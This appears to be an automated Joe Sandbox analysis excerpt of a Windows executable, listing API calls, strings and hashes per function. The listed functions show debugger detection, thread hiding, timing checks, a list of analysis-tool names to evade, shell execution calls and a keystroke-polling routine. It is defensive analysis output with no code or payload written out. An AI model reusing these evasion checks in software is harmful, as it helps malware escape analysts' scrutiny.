??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866157E2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866157ED
GetCurrentProcess.KERNEL32 ref: 00007FF7866157F4
OpenProcessToken.ADVAPI32 ref: 00007FF786615807
GetTokenInformation.KERNELBASE ref: 00007FF78661582B
CloseHandle.KERNELBASE ref: 00007FF78661585E
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786615A02
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786615A0D
CloseHandle.KERNEL32 ref: 00007FF786615A19
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786615BB2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786615BBD
VirtualAlloc.KERNELBASE ref: 00007FF786615BD4
memset.VCRUNTIME140 ref: 00007FF786615BF0
VirtualFree.KERNELBASE ref: 00007FF786615C21
SetLastError.KERNEL32 ref: 00007FF786615C29
GetLastError.KERNEL32 ref: 00007FF786615C36
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786615DE2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786615DED
VirtualFree.KERNEL32 ref: 00007FF786615DFF
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786615FA2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786615FAD
CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF786615FC3
Thread32First.KERNEL32 ref: 00007FF786615FE6
GetCurrentProcessId.KERNEL32 ref: 00007FF786615FF0
GetCurrentThreadId.KERNEL32 ref: 00007FF786615FFC
OpenThread.KERNEL32 ref: 00007FF786616013
LoadLibraryA.KERNEL32 ref: 00007FF786616028
GetProcAddress.KERNEL32 ref: 00007FF786616038
NtSetInformationThread.NTDLL ref: 00007FF786616051
CloseHandle.KERNELBASE ref: 00007FF786616056
Thread32Next.KERNEL32 ref: 00007FF786616064
CloseHandle.KERNELBASE ref: 00007FF786616071
GetTickCount.KERNEL32 ref: 00007FF786616077
GetTickCount.KERNEL32 ref: 00007FF7866160A6
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786616253
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661625E
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866164FF
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661650A
GetProcessHeap.KERNEL32 ref: 00007FF786616511
HeapSetInformation.KERNEL32 ref: 00007FF786616525
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866166D2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866166DD
VirtualAlloc.KERNELBASE ref: 00007FF7866166F7
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866168A3
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866168AE

Strings

8888888888888888, xrefs: 00007FF786614F13, 00007FF78661520B, 00007FF7866162DD
sHM, xrefs: 00007FF786615DA0
sHM, xrefs: 00007FF786615B70
sHM, xrefs: 00007FF786615F60
NtQueryInformationProcess, xrefs: 00007FF786615169
ntdll.dll, xrefs: 00007FF786615151, 00007FF786616021
sHM, xrefs: 00007FF786615100
NtSetInformationThread, xrefs: 00007FF786616031
sHM, xrefs: 00007FF7866159C0
sHM, xrefs: 00007FF786616690
sHM, xrefs: 00007FF7866164C0
sHM, xrefs: 00007FF7866155F0
sHM, xrefs: 00007FF7866157A0
sHM, xrefs: 00007FF786614E40
sHM, xrefs: 00007FF7866153F0

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@exit$Process$Current$Thread$CloseHandleInformationVirtual$AddressAllocCountDebuggerErrorFreeHeapLastLibraryLoadOpenPresentProcThread32TickTokenmemset$CheckContextCreateFirstNextQueryRemoteSnapshotToolhelp32
String ID: 8888888888888888$NtQueryInformationProcess$NtSetInformationThread$ntdll.dll$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM
API String ID: 3073719868-511010757
Opcode ID: d80e0109d9dd51c8f29529a7099985a1ab6b131efeb7b15df16db1ffb0663ea2
Instruction ID: c2403d7319386e1161e2e580718950694fdb5d9c580962db57788e61b1f605c6
Opcode Fuzzy Hash: d80e0109d9dd51c8f29529a7099985a1ab6b131efeb7b15df16db1ffb0663ea2
Instruction Fuzzy Hash: 1BF23666E29BD35AF703A735AC020A6E355BFA3780BA0D333FD1435956EF29B581C604

Function 00007FF786614760 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 241
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF78661478C
GetProcAddress.KERNEL32 ref: 00007FF78661479C
VirtualProtect.KERNELBASE ref: 00007FF7866147B8
VirtualProtect.KERNELBASE ref: 00007FF7866147D9

Part of subcall function 00007FF786614220: ?_Random_device@std@@YAIXZ.MSVCP140 ref: 00007FF78661423F

LoadLibraryA.KERNEL32 ref: 00007FF7866147EB
GetProcAddress.KERNEL32 ref: 00007FF7866147FB
GetCurrentThread.KERNEL32 ref: 00007FF786614809
NtSetInformationThread.NTDLL ref: 00007FF78661481D
QueryPerformanceFrequency.KERNEL32 ref: 00007FF786614824
QueryPerformanceCounter.KERNEL32 ref: 00007FF78661482F
QueryPerformanceCounter.KERNEL32 ref: 00007FF78661485A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786614B6F
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786614B7A

Strings

ntdll.dll, xrefs: 00007FF7866147E4
sHM, xrefs: 00007FF786614B30
kernel32.dll, xrefs: 00007FF786614781
NtSetInformationThread, xrefs: 00007FF7866147F4
IsDebuggerPresent, xrefs: 00007FF786614795

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: PerformanceQuery$AddressCounterProcProtectThreadV01@Virtual$??6?$basic_ostream@CurrentD@std@@@std@@FrequencyHandleInformationLibraryLoadModuleRandom_device@std@@U?$char_traits@V01@@exit
String ID: IsDebuggerPresent$NtSetInformationThread$kernel32.dll$ntdll.dll$sHM
API String ID: 995830000-2745591510
Opcode ID: 797da597ea588a7314047d2e4ab4db3666fa293d0793b7d55f9ee8799fd45766
Instruction ID: a0dd24a4b3746a0fc27530f04e47d95fa76b0db2e244b3b1fb4d5e6173739494
Opcode Fuzzy Hash: 797da597ea588a7314047d2e4ab4db3666fa293d0793b7d55f9ee8799fd45766
Instruction Fuzzy Hash: 33B1E626E29BC247F703A735A802166E321BFA7780FA0D333F95432A55EF29F585C604

Function 00007FF786614300 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E8F8

Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E998

Part of subcall function 00007FF78661E8C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78661E9B6

Part of subcall function 00007FF78661E8C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E975

FindWindowA.USER32 ref: 00007FF7866144BF
FindWindowA.USER32 ref: 00007FF7866145F5

Strings

IDAVW64, xrefs: 00007FF78661454F
WinDbgFrameClass, xrefs: 00007FF786614527
immunitydebugger.exe, xrefs: 00007FF7866143E8
x64dbg.exe, xrefs: 00007FF786614376
IDAVW32, xrefs: 00007FF786614576
ida64.exe, xrefs: 00007FF7866143C2
ida.exe, xrefs: 00007FF78661439C
OLLYDBG, xrefs: 00007FF7866144FE
windbg.exe, xrefs: 00007FF786614437
ghidra.exe, xrefs: 00007FF78661440E
ollydbg.exe, xrefs: 00007FF786614350

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: FindWindowmemcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: IDAVW32$IDAVW64$OLLYDBG$WinDbgFrameClass$ghidra.exe$ida.exe$ida64.exe$immunitydebugger.exe$ollydbg.exe$windbg.exe$x64dbg.exe
API String ID: 3370411492-2758119655
Opcode ID: 39d01d58e774e2d93433319b6c644df0bf1202215ecd7774f32f83ecd9b9e539
Instruction ID: ae9f412713b91fa2a55e8ee6a3db22737e6a4cf58afed4e677c7b48f89335f1d
Opcode Fuzzy Hash: 39d01d58e774e2d93433319b6c644df0bf1202215ecd7774f32f83ecd9b9e539
Instruction Fuzzy Hash: D191B762F14BC5A5E710DB30DC412FAA362FB9A748FA05336E98C52959EF78E684C740

Function 00007FF78662C2E0 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 278
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662C378
__std_fs_code_page.MSVCPRT ref: 00007FF78662C3D3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662C437
ShellExecuteW.SHELL32 ref: 00007FF78662C57A
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662C608
__std_fs_code_page.MSVCPRT ref: 00007FF78662C65E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662C6C2
ShellExecuteW.SHELL32 ref: 00007FF78662C7E9

Strings

me.e, xrefs: 00007FF78662C62F
ysme, xrefs: 00007FF78662C628
h\ph, xrefs: 00007FF78662C621

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: ExecuteShell__std_fs_code_page_invalid_parameter_noinfo_noreturnsystem
String ID: h\ph$me.e$ysme
API String ID: 2996404153-506599315
Opcode ID: eb51fce0e939211add2f346dd73c9435171000e4a9c60cc63438b415af830cb8
Instruction ID: 4dd807e3bf9018d0a66df77da41ef39a4492664d47bac355defcb9c6b57580ab
Opcode Fuzzy Hash: eb51fce0e939211add2f346dd73c9435171000e4a9c60cc63438b415af830cb8
Instruction Fuzzy Hash: C0E1E372F187C18EF301DFB4E4412AEB772FB95348FA05325EE8926A99DB389544CB40

Function 00007FF786614660 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF78661469D
K32EnumProcessModules.KERNEL32 ref: 00007FF7866146B6
GetCurrentProcess.KERNEL32 ref: 00007FF7866146D5
K32GetModuleBaseNameA.KERNEL32 ref: 00007FF7866146EF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF78661470B

Strings

dbghelp.dll, xrefs: 00007FF786614685
dbgcore.dll, xrefs: 00007FF786614691

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: Process$Current$BaseEnumModuleModulesName_stricmp
String ID: dbgcore.dll$dbghelp.dll
API String ID: 3352702578-4118436743
Opcode ID: 09cec174e8ec8f711062b2b9836bdf9a171c51cc0869a4125ed5181775904e84
Instruction ID: c8c6b656c066db5c40efbdf823276d94a9d5de2edeae33fd7e21c70c4347956e
Opcode Fuzzy Hash: 09cec174e8ec8f711062b2b9836bdf9a171c51cc0869a4125ed5181775904e84
Instruction Fuzzy Hash: 57216A71B18AC2A1EB60AB11FC446ABA362FF95784F940132D68D47758DF3CD905CF50

Function 00007FF78662D110 Relevance: 12.1, APIs: 8, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF78662D139
__scrt_release_startup_lock.LIBCMT ref: 00007FF78662D1A7
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662D1F5
_get_initial_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662D1FA
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662D202
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662D20A
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662D22C
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662D286

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
String ID:
API String ID: 1133592946-0
Opcode ID: c5afbf8e885d950ea0899d060960dbc3cc8a49a47591d3e56c902ac37e42553a
Instruction ID: ba87cfc6351b8ff550a0c340d7f69b8e6d8293deaae0db1079175eda7d57fece
Opcode Fuzzy Hash: c5afbf8e885d950ea0899d060960dbc3cc8a49a47591d3e56c902ac37e42553a
Instruction Fuzzy Hash: DC312B11B082C365FB54BB25AC153BB9293BF85784FE44034EA0D477D7CEACAC44CA62

Function 00007FF78662A7E0 Relevance: 10.6, APIs: 7, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF786612731), ref: 00007FF78662A847
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF786612731), ref: 00007FF78662A8B4
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF786612731), ref: 00007FF78662A8DD
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF786612731), ref: 00007FF78662A90F
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF786612731), ref: 00007FF78662A953
?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF786612731), ref: 00007FF78662A95A
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF786612731), ref: 00007FF78662A967

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
String ID:
API String ID: 3395113616-0
Opcode ID: 329c3dcf958a9c8e9d4271257675a02a65d8df5af03fcb16f2c7613346ea93d8
Instruction ID: 85ba3f83955d233bbadc447bb56c046440ba0eb997bc9a3b12fad6f9da3ece06
Opcode Fuzzy Hash: 329c3dcf958a9c8e9d4271257675a02a65d8df5af03fcb16f2c7613346ea93d8
Instruction Fuzzy Hash: 855186327086C196EB209F5AD980239E7A2FB84F91F658531CE4E477A0CF7DD846CB10

Function 00007FF78662A590 Relevance: 3.8, APIs: 3, Instructions: 76
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF786612230: _Query_perf_frequency.MSVCP140 ref: 00007FF78661223D
Part of subcall function 00007FF786612230: _Query_perf_counter.MSVCP140 ref: 00007FF786612246

Sleep.KERNEL32 ref: 00007FF78662A651
Sleep.KERNEL32 ref: 00007FF78662A661
Sleep.KERNEL32 ref: 00007FF78662A68C

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: Sleep$Query_perf_counterQuery_perf_frequency
String ID:
API String ID: 1739919806-0
Opcode ID: c6723bd6158eea82b8f198b2ae34c2a381c1e7ecd74949ff636911ad740d622a
Instruction ID: 84d21c8a7b2cec4f2433786ad0cc57fac0a5a9ffa522485ba9e16351f4c8572d
Opcode Fuzzy Hash: c6723bd6158eea82b8f198b2ae34c2a381c1e7ecd74949ff636911ad740d622a
Instruction Fuzzy Hash: 4B210761B192CA52EF18AB0AA94017BD243BF88BC0FA48435DD5E0BBC5DE7CEC41CB11

Function 00007FF786611140 Relevance: 3.0, APIs: 2, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF786611164
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF786611185

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintf
String ID:
API String ID: 2168557111-0
Opcode ID: 3c8e80d9ca3e2c7b43a2e1ea7777abfe8b5e07f2f4ec2fbcf44e96190c50b72e
Instruction ID: 70ce29efcc74920760de4e3b3d94119c0ee6d16c28913b85f3dcf41078409bea
Opcode Fuzzy Hash: 3c8e80d9ca3e2c7b43a2e1ea7777abfe8b5e07f2f4ec2fbcf44e96190c50b72e
Instruction Fuzzy Hash: 43E03972A08B8192D6109B50FD0449EF3A5FB98BC4F904035EB8C47A28CF7CD5A8CB40

Function 00007FF786614220 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?_Random_device@std@@YAIXZ.MSVCP140 ref: 00007FF78661423F

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: Random_device@std@@
String ID:
API String ID: 1041445435-0
Opcode ID: 28c1337a0c4bbcf66444afd84d7112ef80574800b80566611c4d0cd3c1759fbf
Instruction ID: 48db12b205ade12d9b050786376b7498e9f38cfba52ad5d2946523452fee0e7a
Opcode Fuzzy Hash: 28c1337a0c4bbcf66444afd84d7112ef80574800b80566611c4d0cd3c1759fbf
Instruction Fuzzy Hash: 0C11C871B186C196EF64A764F8663BBA296FBC9340FA05135F54E82BC5DE2CD604CF10

Function 00007FF7865E1000 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00007FF7865E1006

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 3f38d4103dd383ce7011d925abf406c2c39e63471424fb4dbc7d99e96c52857d
Instruction ID: 83f0736a2b6ae8c59f67434a329f1ee2ac958c9f575c6c9033f574fc1ff9d51b
Opcode Fuzzy Hash: 3f38d4103dd383ce7011d925abf406c2c39e63471424fb4dbc7d99e96c52857d
Instruction Fuzzy Hash: FDB09264F092C2D6DB083B726C4202A6161BB18201FF00539C50A40210CD2C569ACF10

Non-executed Functions

Function 00007FF78661B2D0 Relevance: 111.9, APIs: 4, Strings: 59, Instructions: 1685keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32 ref: 00007FF78661B323

Part of subcall function 00007FF7865F3190: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F31F3
Part of subcall function 00007FF7865F3190: memcpy.VCRUNTIME140 ref: 00007FF7865F3213
Part of subcall function 00007FF7865F3190: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3233

Part of subcall function 00007FF78661A3E0: CreateThread.KERNEL32 ref: 00007FF78661A4CA
